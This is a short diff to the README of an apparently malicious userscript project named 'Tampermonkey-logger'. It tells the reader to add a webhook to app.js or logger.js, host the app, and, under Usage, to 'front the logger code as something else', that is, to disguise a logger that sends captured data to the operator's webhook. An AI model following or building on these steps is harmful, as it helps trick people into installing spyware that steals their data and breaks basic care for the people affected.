Mohalkkk/Tampermonkey-logger/README.md

 - Add your webhook into app.js
 - Host the application somewhere
 - Change urls in logger.js
+- OR you can directly put your webhook into the logger.js

 ## Usage
 - Front the logger code as something else